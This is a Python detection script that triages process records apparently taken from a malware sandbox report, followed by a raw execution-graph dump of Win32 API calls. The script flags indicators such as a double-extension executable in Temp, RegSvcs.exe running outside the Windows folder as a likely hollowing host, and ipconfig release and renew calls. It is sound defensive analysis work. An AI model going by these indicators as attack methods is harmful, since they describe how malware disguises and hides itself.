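import re

# Constructed sample: five of the process records from this report, reduced to the
# fields the checks below read. Layout is the report's own "Key:value" one record
# per blank-line-separated block.
SAMPLE_REPORT = """\
Target ID:7
Path:C:\\Windows\\SysWOW64\\ipconfig.exe
Commandline:ipconfig /release
Has administrator privileges:true

Target ID:8
Path:C:\\Windows\\SysWOW64\\cmd.exe
Commandline:"C:\\Windows\\System32\\cmd.exe" /c ipconfig /renew
Has administrator privileges:true

Target ID:12
Path:C:\\Users\\user\\AppData\\Local\\Temp\\RegSvcs.exe
Commandline:"C:\\Users\\user\\AppData\\Local\\Temp\\RegSvcs.exe"
Has administrator privileges:true

Target ID:15
Path:C:\\Users\\user\\AppData\\Local\\Temp\\afda\\cipkucw.ppt.exe
Commandline:"C:\\Users\\user\\AppData\\Local\\Temp\\afda\\CIPKUC~1.EXE" C:\\Users\\user\\AppData\\Local\\Temp\\afda\\xdgrnj.pdf
Has administrator privileges:false

Target ID:16
Path:C:\\Users\\user\\AppData\\Local\\Temp\\RegSvcs.exe
Commandline:"C:\\Users\\user\\AppData\\Local\\Temp\\RegSvcs.exe"
Has administrator privileges:false
"""

# Patterns (illustrative choices, not official rule content).
TEMP_DIR = re.compile(r"\\AppData\\Local\\Temp\\", re.IGNORECASE)
DOUBLE_EXT = re.compile(r"\.(ppt|pptx|pdf|doc|docx|xls|xlsx|txt|jpg|png)\.exe$", re.IGNORECASE)
DOC_ARG = re.compile(r"\s\S+\.(pdf|ppt|doc|txt|dat)$", re.IGNORECASE)
IPCONFIG_RESET = re.compile(r"\bipconfig(\.exe)?\b.*\s/(release|renew)\b", re.IGNORECASE)
# .NET framework utilities often used as hollowing hosts. Assumption: a genuine copy
# lives under C:\Windows, so any other location is worth a look.
DOTNET_HOSTS = {"regsvcs.exe", "regasm.exe", "installutil.exe", "msbuild.exe"}


def parse_records(text):
    """Split report text into one dict per process record."""
    records = []
    for chunk in re.split(r"\n\s*\n", text.strip()):
        rec = {}
        for line in chunk.splitlines():
            key, sep, value = line.partition(":")  # first colon ends the key
            if sep:
                rec[key.strip()] = value.strip()
        if rec:
            records.append(rec)
    return records


def basename(path):
    return path.rsplit("\\", 1)[-1]


def check_record(rec):
    """Return the list of check names a single record triggers, in a fixed order."""
    findings = []
    path = rec.get("Path", "")
    cmd = rec.get("Commandline", "")
    name = basename(path).lower()
    if DOUBLE_EXT.search(name):
        findings.append("double_extension_executable")
    if TEMP_DIR.search(path):
        findings.append("executable_in_user_temp")
    if name in DOTNET_HOSTS and not path.lower().startswith("c:\\windows\\"):
        findings.append("dotnet_host_outside_windows_dir")
    if TEMP_DIR.search(path) and DOC_ARG.search(cmd):
        findings.append("document_named_argument")
    if IPCONFIG_RESET.search(cmd):
        findings.append("ipconfig_release_or_renew")
    return findings


def triage(text):
    """Map Target ID -> findings for every record that triggers at least one check."""
    out = {}
    for rec in parse_records(text):
        hits = check_record(rec)
        if hits:
            out[rec.get("Target ID", "?")] = hits
    return out


if __name__ == "__main__":
    for target_id, hits in triage(SAMPLE_REPORT).items():
        print(f"Target ID {target_id}: {', '.join(hits)}")
```

Run against the full report the same way: paste the process records into `SAMPLE_REPORT` or read them from a file. Records with no findings (conhost.exe, for instance) are dropped, so the output is the short list of processes to look at first.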


                                        Execution Graph

                                        Execution Coverage:9.8%
                                        Dynamic/Decrypted Code Coverage:0%
                                        Signature Coverage:10.9%
                                        Total number of Nodes:1925
                                        Total number of Limit Nodes:45
                                        [Execution graph: the rendered node/edge dump is not reproduced here. Its edges reference Win32 APIs including GetCurrentProcess, GetProcessAffinityMask, IsProcessorFeaturePresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter, TerminateProcess, SetFilePointer, GetLastError, LoadLibraryExA, FreeLibrary, GetModuleHandleW, GetProcAddress, VirtualQuery, VirtualProtect, GetSystemInfo, RtlAcquireSRWLockExclusive, RtlReleaseSRWLockExclusive, RtlAllocateHeap, RaiseException, GetCommandLineW, GetTickCount, WideCharToMultiByte, LoadStringW, and the dialog/message-loop APIs DialogBoxParamW, EndDialog, GetDlgItem, SetDlgItemTextW, SendDlgItemMessageW, SendMessageW, PeekMessageW, GetMessageW, IsDialogMessageW, TranslateMessage, DispatchMessageW, SetFocus, EnableWindow, ShowWindow, GetWindowLongW, SetWindowLongW, together with CRT delay-load helpers (___delayLoadHelper2@8, DloadProtectSection, DloadReleaseSectionWriteAccess), __EH_prolog3 frames and _com_raise_error error paths.]
291d4f 48 API calls 28174->28175 28175->28168 28176 290e4e 28408 293e53 28 API calls __EH_prolog3 28176->28408 28179 291031 28177->28179 28181 271a66 26 API calls 28179->28181 28180 290e6b CreateFileMappingW 28182 290e9d MapViewOfFile 28180->28182 28183 290ed5 ShellExecuteExW 28180->28183 28181->28106 28184 290ed2 __InternalCxxFrameHandler 28182->28184 28185 290ef3 28183->28185 28184->28183 28186 290f3d 28185->28186 28187 290f00 WaitForInputIdle 28185->28187 28190 290f60 UnmapViewOfFile CloseHandle 28186->28190 28191 290f73 28186->28191 28188 290f1e 28187->28188 28188->28186 28189 290f23 Sleep 28188->28189 28189->28186 28189->28188 28190->28191 28409 272e8b 28191->28409 28194 271a66 26 API calls 28195 290f83 28194->28195 28196 271a66 26 API calls 28195->28196 28197 290f8e 28196->28197 28197->28100 28199 271ea6 28198->28199 28200 271e4d 28198->28200 28421 283e83 GetWindowLongW SetWindowLongW 28199->28421 28202 271eb3 28200->28202 28420 283eaa 64 API calls 3 library calls 28200->28420 28202->27956 28202->27957 28202->28001 28204 271e6f 28204->28202 28205 271e82 GetDlgItem 28204->28205 28205->28202 28206 271e92 28205->28206 28206->28202 28207 271e98 SetWindowTextW 28206->28207 28207->28202 28422 2957d8 28208->28422 28210 271cee GetDlgItem 28211 271d1d 28210->28211 28212 271d0b 28210->28212 28423 271d64 28211->28423 28213 2714a7 28 API calls 28212->28213 28215 271d18 28213->28215 28216 271d4d 28215->28216 28217 271a66 26 API calls 28215->28217 28218 271d5a 28216->28218 28219 271a66 26 API calls 28216->28219 28217->28216 28220 295787 5 API calls 28218->28220 28219->28218 28221 271d61 28220->28221 28221->27981 28221->28106 28221->28172 28224 27eaff __EH_prolog3_GS 28222->28224 28223 27eb09 28225 295787 5 API calls 28223->28225 28224->28223 28226 27eb84 28224->28226 28231 271a66 26 API calls 28224->28231 28436 27769f 28224->28436 28443 27efef 28224->28443 28227 27ebb6 28225->28227 28226->28223 28229 27efef 54 API calls 28226->28229 28227->28068 28227->28069 28229->28223 
28231->28224 28233 282230 28232->28233 28234 282232 SetCurrentDirectoryW 28232->28234 28233->28234 28234->28077 28236 273280 28235->28236 28554 272f0f 28236->28554 28239 295734 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 28240 27329d 28239->28240 28241 272f45 28240->28241 28242 272f55 _wcslen 28241->28242 28558 275962 28242->28558 28244 272f63 28244->28117 28246 27dea6 __EH_prolog3_GS 28245->28246 28247 27def4 28246->28247 28248 27df09 CreateFileW 28246->28248 28249 28169a 47 API calls 28247->28249 28256 27df9e 28247->28256 28248->28247 28250 27df49 28249->28250 28252 27df6e 28250->28252 28254 27df56 28250->28254 28255 27df59 CreateFileW 28250->28255 28251 295787 5 API calls 28253 27dfdf 28251->28253 28252->28256 28567 2719a9 26 API calls 28252->28567 28253->28142 28253->28143 28254->28255 28255->28252 28256->28251 28259 27ddf8 28258->28259 28266 27de09 28258->28266 28262 27de04 28259->28262 28263 27de0b 28259->28263 28259->28266 28260 271a66 26 API calls 28261 27de18 28260->28261 28261->28156 28568 27dfe2 28262->28568 28573 27de50 28263->28573 28266->28260 28267->28105 28268->28119 28269->28134 28283 291d5e __EH_prolog3_GS 28270->28283 28272 29349a 28273 271a66 26 API calls 28272->28273 28274 2934a5 28273->28274 28275 295787 5 API calls 28274->28275 28276 2910c5 28275->28276 28276->28149 28277 27769f 45 API calls 28277->28283 28278 2725a4 26 API calls 28278->28283 28280 2714a7 28 API calls 28280->28283 28282 28645a 28 API calls 28282->28283 28283->28272 28283->28277 28283->28278 28283->28280 28283->28282 28285 271a66 26 API calls 28283->28285 28286 2934ad 28283->28286 28594 29030a 28283->28594 28598 2862cd 30 API calls 2 library calls 28283->28598 28599 28f5b2 28 API calls 28283->28599 28600 27adaa CompareStringW 28283->28600 28601 2944c0 26 API calls 28283->28601 28285->28283 28602 2758cb 45 API calls 28286->28602 28291 293c87 __EH_prolog3_catch_GS _wcslen 28290->28291 28608 286a89 28291->28608 28293 293cba 28612 277903 28293->28612 28302 295796 5 API 
calls 28303 2910e0 28302->28303 28303->28163 29492 28eaa6 28304->29492 28307 293885 28310 295734 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 28307->28310 28308 2937bf GetWindow 28308->28307 28309 2937d8 28308->28309 28309->28307 28312 2937e5 GetClassNameW 28309->28312 28314 293809 GetWindowLongW 28309->28314 28315 29386d GetWindow 28309->28315 28311 291266 28310->28311 28311->27964 28311->27965 29497 288da4 CompareStringW 28312->29497 28314->28315 28316 293819 SendMessageW 28314->28316 28315->28307 28315->28309 28316->28315 28318 29382f 28316->28318 29498 28eae5 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 28318->29498 29499 28eac4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 28318->29499 29500 28ef21 11 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 28318->29500 28321 293857 SendMessageW DeleteObject 28321->28315 29503 2957a5 28322->29503 28324 281315 GetCurrentDirectoryW 28325 281327 28324->28325 28328 281323 28324->28328 29504 271bbd 28 API calls 28325->29504 28327 281339 GetCurrentDirectoryW 28329 281356 _wcslen 28327->28329 28328->27979 28329->28328 28330 2712a7 26 API calls 28329->28330 28330->28328 28332 271e11 SetWindowTextW 28331->28332 28333 271e0f 28331->28333 28332->27993 28333->28332 28335 28f2f9 28334->28335 28336 28f31e 28334->28336 29505 288da4 CompareStringW 28335->29505 28338 28f32c 28336->28338 28339 28f323 SHAutoComplete 28336->28339 28341 295734 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 28338->28341 28339->28338 28340 28f30c 28340->28336 28342 28f310 FindWindowExW 28340->28342 28343 28f337 28341->28343 28342->28336 28344 28fdd1 28343->28344 28345 28fded 28344->28345 28346 2720b0 30 API calls 28345->28346 28347 28fe27 28346->28347 29506 272dbb 28347->29506 28350 28fe4c 29513 27278b 28350->29513 28351 28fe43 28352 27232c 123 API calls 28351->28352 28354 28fe48 28352->28354 28357 295734 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 28354->28357 28356 27232c 123 API calls 28356->28354 28358 28fe77 28357->28358 
28358->28018 28358->28022 28359->27988 28360->28001 28362 295734 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 28361->28362 28363 2957a0 28362->28363 28363->28363 28365 2714bd _wcslen 28364->28365 28366 27120c 28 API calls 28365->28366 28367 2714ca 28366->28367 28368 293572 28367->28368 28369 290678 5 API calls 28368->28369 28370 29358d GetDlgItem 28369->28370 28371 2935e4 SendMessageW SendMessageW 28370->28371 28372 2935ac 28370->28372 28373 293643 SendMessageW 28371->28373 28374 293624 28371->28374 28375 2935b7 ShowWindow SendMessageW SendMessageW 28372->28375 28376 29365b 28373->28376 28377 29365d SendMessageW SendMessageW 28373->28377 28374->28373 28375->28371 28376->28377 28378 29367f SendMessageW 28377->28378 28379 2936a2 SendMessageW 28377->28379 28378->28379 28380 295734 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 28379->28380 28381 2936c0 28380->28381 28381->28021 28383 27768c 28382->28383 29597 277430 28383->29597 28385 277699 28386 2934eb 28 API calls __EH_prolog3_GS 28385->28386 28386->28014 28387->28040 28389 27ed1f 49 API calls 28388->28389 28390 27ed16 28389->28390 28390->28043 28390->28075 28391->28043 28393 281405 __EH_prolog3 28392->28393 28394 2956f6 28 API calls 28393->28394 28395 28140f 28394->28395 28396 281431 GetModuleFileNameW 28395->28396 28397 281463 28395->28397 28398 271be3 28 API calls 28395->28398 28396->28395 28396->28397 28399 2714a7 28 API calls 28397->28399 28398->28395 28400 28146c 28399->28400 28401 28147f 28400->28401 28402 2712a7 26 API calls 28400->28402 28401->28113 28402->28401 28403->28127 28404->28158 28405->28165 28406->28171 28407->28176 28408->28180 28410 272e93 28409->28410 28411 272ea0 28409->28411 28412 2712a7 26 API calls 28410->28412 28411->28194 28412->28411 28413->28120 28414->28172 28415->28083 28416->28123 28417->28078 28418->28063 28419->28051 28420->28204 28421->28202 28422->28210 28434 2957d8 28423->28434 28425 271d70 GetWindowTextLengthW 28435 271bbd 28 API calls 28425->28435 28427 
271dab GetWindowTextW 28428 2714a7 28 API calls 28427->28428 28429 271dca 28428->28429 28430 271ddd 28429->28430 28431 2712a7 26 API calls 28429->28431 28432 295787 5 API calls 28430->28432 28431->28430 28433 271de4 28432->28433 28433->28215 28434->28425 28435->28427 28437 2776e1 28436->28437 28438 2776bb 28436->28438 28471 2758cb 45 API calls 28437->28471 28462 27120c 28438->28462 28442 2776db 28442->28224 28446 27effb __EH_prolog3_GS 28443->28446 28444 27f02f 28447 27ed0d 49 API calls 28444->28447 28445 27f01b CreateDirectoryW 28445->28444 28448 27f0d0 28445->28448 28446->28444 28446->28445 28449 27f03b 28447->28449 28450 27f0df 28448->28450 28474 27f58b 28448->28474 28451 27f0e3 GetLastError 28449->28451 28487 28169a 28449->28487 28455 295787 5 API calls 28450->28455 28451->28450 28457 27f100 28455->28457 28456 27f07d 28461 27f0ad 28456->28461 28544 2719a9 26 API calls 28456->28544 28457->28224 28458 27f073 CreateDirectoryW 28458->28456 28459 27f070 28459->28458 28461->28448 28461->28451 28463 27127d 28462->28463 28466 27121d 28462->28466 28473 271a92 28 API calls 28463->28473 28470 271228 28466->28470 28472 2712d3 28 API calls Concurrency::cancel_current_task 28466->28472 28468 271254 28469 2711b8 28 API calls 28468->28469 28469->28470 28470->28442 28472->28468 28475 27f597 __EH_prolog3_GS 28474->28475 28476 27f5a4 SetFileAttributesW 28475->28476 28477 27f5b7 28476->28477 28485 27f622 28476->28485 28479 28169a 47 API calls 28477->28479 28478 295787 5 API calls 28480 27f638 28478->28480 28481 27f5d7 28479->28481 28480->28450 28482 27f5f6 28481->28482 28483 27f5e7 SetFileAttributesW 28481->28483 28484 27f5e4 28481->28484 28482->28485 28545 2719a9 26 API calls 28482->28545 28483->28482 28484->28483 28485->28478 28488 2816e0 28487->28488 28489 2816e7 28487->28489 28491 295734 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 28488->28491 28490 2714a7 28 API calls 28489->28490 28493 2816f4 28490->28493 28492 27f063 28491->28492 28492->28456 28492->28458 
28492->28459 28494 2817db 28493->28494 28495 281711 28493->28495 28496 281309 30 API calls 28494->28496 28497 28171b 28495->28497 28506 281741 28495->28506 28502 2817fb 28496->28502 28546 280ba6 28 API calls 28497->28546 28499 2818ed 28500 281739 28499->28500 28553 2719a9 26 API calls 28499->28553 28503 271a66 26 API calls 28500->28503 28501 281729 28505 2725a4 26 API calls 28501->28505 28502->28499 28508 28181f 28502->28508 28509 281875 28502->28509 28503->28488 28507 281731 28505->28507 28506->28500 28512 27769f 45 API calls 28506->28512 28510 271a66 26 API calls 28507->28510 28549 280c41 28 API calls 28508->28549 28551 280ba6 28 API calls 28509->28551 28510->28500 28515 281789 28512->28515 28513 281883 28516 2725a4 26 API calls 28513->28516 28547 280bf3 28 API calls _wcslen 28515->28547 28519 28188c 28516->28519 28517 281838 28550 271188 28 API calls 28517->28550 28522 271a66 26 API calls 28519->28522 28521 28179e 28548 27aef3 28 API calls 28521->28548 28525 281894 28522->28525 28523 281848 28530 2725a4 26 API calls 28523->28530 28552 280ddb 28 API calls 28525->28552 28526 2817b2 28528 2725a4 26 API calls 28526->28528 28532 2817be 28528->28532 28529 28189c 28536 27769f 45 API calls 28529->28536 28531 281860 28530->28531 28533 271a66 26 API calls 28531->28533 28534 271a66 26 API calls 28532->28534 28535 281868 28533->28535 28537 2817c6 28534->28537 28538 271a66 26 API calls 28535->28538 28540 281870 28536->28540 28539 271a66 26 API calls 28537->28539 28538->28540 28541 2817ce 28539->28541 28543 271a66 26 API calls 28540->28543 28542 271a66 26 API calls 28541->28542 28542->28500 28543->28499 28544->28461 28545->28485 28546->28501 28547->28521 28548->28526 28549->28517 28550->28523 28551->28513 28552->28529 28553->28500 28555 272f26 28554->28555 28556 272f2f 28554->28556 28555->28239 28557 27120c 28 API calls 28556->28557 28557->28555 28559 275975 28558->28559 28560 275a3a 28558->28560 28564 275987 28559->28564 28565 273029 28 API calls 28559->28565 28566 2758cb 45 
API calls 28560->28566 28564->28244 28565->28564 28567->28256 28569 27e015 28568->28569 28572 27dfeb 28568->28572 28569->28266 28572->28569 28579 27ec63 28572->28579 28574 27de5c 28573->28574 28576 27de76 28573->28576 28574->28576 28577 27de68 CloseHandle 28574->28577 28575 27de95 28575->28266 28576->28575 28593 27925b 109 API calls 28576->28593 28577->28576 28580 27ec6f __EH_prolog3_GS 28579->28580 28581 27ec7c DeleteFileW 28580->28581 28582 27ec8c 28581->28582 28591 27ecf4 28581->28591 28584 28169a 47 API calls 28582->28584 28583 295787 5 API calls 28585 27e013 28583->28585 28586 27ecac 28584->28586 28585->28266 28587 27ecc8 28586->28587 28588 27ecbc DeleteFileW 28586->28588 28589 27ecb9 28586->28589 28587->28591 28592 2719a9 26 API calls 28587->28592 28588->28587 28589->28588 28591->28583 28592->28591 28593->28575 28595 29031d 28594->28595 28596 290324 28594->28596 28595->28283 28596->28595 28603 271b63 28596->28603 28598->28283 28599->28283 28600->28283 28601->28283 28604 271b6f 28603->28604 28605 271b8e 28603->28605 28604->28596 28607 2713f7 28 API calls 28605->28607 28607->28604 28609 286a99 _wcslen 28608->28609 28663 271be3 28609->28663 28611 286abb 28611->28293 28613 286a74 28612->28613 28614 286a89 28 API calls 28613->28614 28615 286a86 28614->28615 28616 27b03d 28615->28616 28617 27b049 __EH_prolog3_GS 28616->28617 28668 282815 28617->28668 28619 27b092 28678 27b231 28619->28678 28622 271a66 26 API calls 28623 27b120 28622->28623 28624 271a66 26 API calls 28623->28624 28625 27b128 28624->28625 28626 2956f6 28 API calls 28625->28626 28627 27b13f 28626->28627 28683 28a599 28627->28683 28629 27b172 28630 295787 5 API calls 28629->28630 28631 27b179 28630->28631 28632 27b3e1 28631->28632 28633 27b3ed __EH_prolog3_GS 28632->28633 28634 27b478 28633->28634 28637 27b484 28633->28637 28737 27f711 28633->28737 28635 271a66 26 API calls 28634->28635 28635->28637 28640 27b4e0 28637->28640 28704 27bc65 28637->28704 28639 295787 5 API calls 28641 27b543 28639->28641 
28642 27b529 28640->28642 28744 27204b 89 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 28640->28744 28644 27b194 28641->28644 28642->28639 29436 27d6bc 28644->29436 28647 27b1d0 28649 271a66 26 API calls 28647->28649 28650 27b1e8 28649->28650 28651 271a66 26 API calls 28650->28651 28652 27b1f3 28651->28652 28653 271a66 26 API calls 28652->28653 28654 27b1fe 28653->28654 29450 2828aa 28654->29450 28656 27b206 28657 271a66 26 API calls 28656->28657 28658 27b20e 28657->28658 28659 271a66 26 API calls 28658->28659 28660 27b216 28659->28660 28661 27d869 26 API calls 28660->28661 28662 27b21d 28661->28662 28662->28302 28664 271c03 28663->28664 28665 271bfb 28663->28665 28664->28665 28667 271c33 28 API calls 28664->28667 28665->28611 28667->28665 28669 282821 __EH_prolog3 28668->28669 28670 2956f6 28 API calls 28669->28670 28671 28285f 28670->28671 28672 282872 28671->28672 28689 2780ec 28671->28689 28674 2956f6 28 API calls 28672->28674 28675 282883 28674->28675 28676 2780ec 28 API calls 28675->28676 28677 282896 28675->28677 28676->28677 28677->28619 28679 2725a4 26 API calls 28678->28679 28680 27b23f 28679->28680 28681 2725a4 26 API calls 28680->28681 28682 27b118 28681->28682 28682->28622 28684 28a5a5 __EH_prolog3 28683->28684 28685 2956f6 28 API calls 28684->28685 28686 28a5bf 28685->28686 28687 28a5d6 28686->28687 28703 287445 112 API calls 28686->28703 28687->28629 28690 2780f8 __EH_prolog3 28689->28690 28695 295b4b 28690->28695 28692 278111 28693 295b4b 28 API calls 28692->28693 28694 278133 _abort 28693->28694 28694->28672 28697 295b57 __FrameHandler3::FrameUnwindToState 28695->28697 28696 295b82 28696->28692 28697->28696 28699 278180 28697->28699 28700 27818c __EH_prolog3 28699->28700 28701 284f2b 28 API calls 28700->28701 28702 278196 28701->28702 28702->28697 28703->28687 28705 27bc80 28704->28705 28745 2720b0 28705->28745 28707 27bca7 28708 27bcba 28707->28708 28969 27e910 28707->28969 28713 27bcec 28708->28713 28757 2727e0 28708->28757 28712 27bce8 
28712->28713 28781 272d41 160 API calls __EH_prolog3_GS 28712->28781 28946 27232c 28713->28946 28718 27bd14 28719 27be08 28718->28719 28721 277673 28 API calls 28718->28721 28782 27bec2 7 API calls 28719->28782 28722 27bd36 28721->28722 28973 281e54 46 API calls 2 library calls 28722->28973 28724 27f711 53 API calls 28733 27bd53 28724->28733 28725 27be76 28725->28713 28786 2752d8 28725->28786 28798 27bf3d 28725->28798 28726 27be16 28726->28725 28783 28864f 28726->28783 28727 27bde8 28731 271a66 26 API calls 28727->28731 28730 271a66 26 API calls 28730->28733 28734 27bded 28731->28734 28733->28724 28733->28727 28733->28730 28974 281e54 46 API calls 2 library calls 28733->28974 28736 271a66 26 API calls 28734->28736 28736->28719 28738 281a9f 5 API calls 28737->28738 28739 27f723 28738->28739 28740 27f74b 28739->28740 29394 27f826 28739->29394 28740->28633 28743 27f738 FindClose 28743->28740 28744->28642 28746 2720bc __EH_prolog3 28745->28746 28747 2780ec 28 API calls 28746->28747 28748 2720d9 28747->28748 28749 282815 28 API calls 28748->28749 28750 2720e8 28749->28750 28751 2956f6 28 API calls 28750->28751 28755 272193 28750->28755 28752 272180 28751->28752 28754 2776e7 30 API calls 28752->28754 28752->28755 28754->28755 28975 28026f 28755->28975 28756 272227 _abort 28756->28707 28758 2727ec __EH_prolog3 28757->28758 28759 2711dd 28 API calls 28758->28759 28763 272838 28758->28763 28777 27298b 28758->28777 28764 272882 28759->28764 28760 2729a9 28986 27204b 89 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 28760->28986 28762 2752d8 133 API calls 28767 2729f4 28762->28767 28763->28760 28765 2729b6 28763->28765 28779 27e850 111 API calls 28764->28779 28765->28762 28765->28777 28766 272a3c 28770 272a6f 28766->28770 28766->28777 28987 27204b 89 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 28766->28987 28767->28766 28769 2752d8 133 API calls 28767->28769 28769->28767 28770->28777 28780 27e850 111 API calls 28770->28780 28771 272986 28773 272e8b 26 API calls 
28771->28773 28772 272995 28774 272e8b 26 API calls 28772->28774 28773->28777 28774->28763 28775 2728ad 28775->28771 28775->28772 28776 2752d8 133 API calls 28778 272ac0 28776->28778 28777->28712 28778->28776 28778->28777 28779->28775 28780->28778 28781->28718 28782->28726 28988 294300 28783->28988 28787 2752e4 28786->28787 28788 2752e8 28786->28788 28787->28725 28797 27e850 111 API calls 28788->28797 28789 2752fa 28790 275315 28789->28790 28791 275323 28789->28791 28796 275355 28790->28796 29018 2748aa 118 API calls 2 library calls 28790->29018 29019 273d9d 131 API calls 3 library calls 28791->29019 28793 275321 28793->28796 29020 27344b 89 API calls 28793->29020 28796->28725 28797->28789 28799 27bf95 28798->28799 28804 27bfc4 28799->28804 28863 27c2fd 28799->28863 29120 28cdb4 135 API calls __EH_prolog3_GS 28799->29120 28800 27d2e5 28802 27d331 28800->28802 28803 27d2ea 28800->28803 28802->28863 29192 28cdb4 135 API calls __EH_prolog3_GS 28802->29192 28803->28863 29191 27ab88 185 API calls 28803->29191 28804->28800 28808 27bfeb 28804->28808 28804->28863 28805 295734 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 28806 27d327 28805->28806 28806->28725 28808->28863 29021 277e1b 28808->29021 28811 27c0c8 29033 28106b 28811->29033 28815 27c151 28819 27c16f 28815->28819 29122 282095 45 API calls __EH_prolog3_GS 28815->29122 28817 27c269 28824 27c29b 28817->28824 29123 2719a9 26 API calls 28817->29123 28818 27d205 28820 27c948 28818->28820 28858 27c743 28818->28858 28845 27c239 28819->28845 29125 280ddb 28 API calls 28819->29125 28835 27c97a 28820->28835 29158 2719a9 26 API calls 28820->29158 28822 27c374 28822->28818 28825 27c3cf 28822->28825 28826 27c3ea 28822->28826 28824->28863 29124 2719a9 26 API calls 28824->29124 28827 271a66 26 API calls 28825->28827 28838 27c409 28826->28838 29127 27b92d 56 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 28826->29127 28832 27c3da 28827->28832 28837 271a66 26 API calls 28832->28837 28834 27d276 28834->28863 29190 
2719a9 26 API calls 28834->29190 28835->28863 29159 2719a9 26 API calls 28835->29159 28837->28863 28840 27c4ea 28838->28840 28841 27f711 53 API calls 28838->28841 28839 27c33d _wcslen 29126 27f103 52 API calls 2 library calls 28839->29126 29043 27b2ee 28840->29043 28852 27c49b 28841->28852 28845->28817 28845->28822 28846 27c5c2 28847 27c7d8 28846->28847 28851 27c5cf 28846->28851 29136 282a36 115 API calls 28847->29136 28848 271a66 26 API calls 28848->28840 28887 27c62c 28851->28887 29130 2757c0 28 API calls 2 library calls 28851->29130 28852->28848 28855 27c501 28862 27c551 28855->28862 29128 2719a9 26 API calls 28855->29128 28856 27c8f0 28865 27c9eb 28856->28865 28882 27c8ff 28856->28882 28857 27c830 28857->28856 28866 27c859 28857->28866 28858->28834 29189 2719a9 26 API calls 28858->29189 28862->28863 29129 2719a9 26 API calls 28862->29129 28863->28805 28878 27c874 28865->28878 29049 27b345 28865->29049 28871 27ed0d 49 API calls 28866->28871 28873 27ca64 28866->28873 28866->28878 28867 27c940 28869 27ddc7 114 API calls 28867->28869 28869->28820 28870 27d1f2 28874 27ddc7 114 API calls 28870->28874 28875 27c8b3 28871->28875 28872 27ca01 28876 27ca05 28872->28876 29055 27b778 28872->29055 28873->28870 28898 27cac5 28873->28898 29160 27e152 28873->29160 28874->28818 28875->28878 29138 27d8b8 28875->29138 28879 27ddc7 114 API calls 28876->28879 28878->28873 28878->28876 28883 27b345 90 API calls 28878->28883 28879->28858 28882->28867 29157 27b544 144 API calls __EH_prolog3_GS 28882->29157 28890 27ca5e 28883->28890 28886 27cb15 28892 27fd70 28 API calls 28886->28892 28887->28858 28888 27c77a 28887->28888 28894 27c781 28887->28894 29131 27b015 28 API calls 28887->29131 29132 282a36 115 API calls 28887->29132 29133 2732d2 89 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 28887->29133 29134 27b8ed 89 API calls 28887->29134 29135 2732d2 89 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 28888->29135 28890->28873 28890->28876 28912 27cb2f 28892->28912 
28894->28857 29137 27ede9 119 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 28894->29137 28896 27cab7 29164 279653 109 API calls 28896->29164 29085 27fd70 28898->29085 28899 27cc21 28900 27cf27 28899->28900 28901 27cc76 28899->28901 28903 27cf50 28900->28903 28904 27cf39 28900->28904 28927 27ccb5 28900->28927 28902 27cd33 28901->28902 28906 27cc94 28901->28906 29168 2822b9 28 API calls 28902->29168 29089 289625 28903->29089 29175 27d771 28904->29175 28910 27ccd8 28906->28910 28919 27cca3 28906->28919 28909 27cd69 28913 28106b 45 API calls 28909->28913 28910->28927 29167 27a7a2 142 API calls 28910->29167 28911 27cf73 29107 2894ea 28911->29107 28912->28899 29165 27e39d 8 API calls 28912->29165 28917 27cd76 28913->28917 29169 27b92d 56 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 28917->29169 29166 2732d2 89 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 28919->29166 28922 27cdaf 28923 27cddd 28922->28923 28924 27cddf 28922->28924 28925 27cdcd 28922->28925 28930 27ce3e 28923->28930 29172 2719a9 26 API calls 28923->29172 29171 27d3d7 135 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 28924->29171 29170 27a496 119 API calls 28925->29170 28932 27cf15 28927->28932 29174 27fd28 5 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 28927->29174 28930->28927 29173 2719a9 26 API calls 28930->29173 28935 27d044 28932->28935 29186 2732d2 89 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 28932->29186 28934 27d115 29115 27e772 28934->29115 28935->28870 28935->28934 28938 27d161 28935->28938 29114 27e8d9 SetEndOfFile 28935->29114 28938->28870 28940 27f58b 49 API calls 28938->28940 28939 27d159 28941 27de50 110 API calls 28939->28941 28942 27d1d2 28940->28942 28941->28938 28942->28870 29187 2732d2 89 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 28942->29187 28944 27d1e8 29188 279500 109 API calls __EH_prolog3_GS 28944->29188 28947 27233e 28946->28947 28951 272350 28946->28951 28947->28951 29390 2723b0 26 API calls 28947->29390 28948 271a66 
